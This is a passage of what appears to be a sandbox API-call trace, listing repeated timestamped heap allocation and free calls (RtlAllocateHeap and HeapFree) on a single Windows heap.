dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) 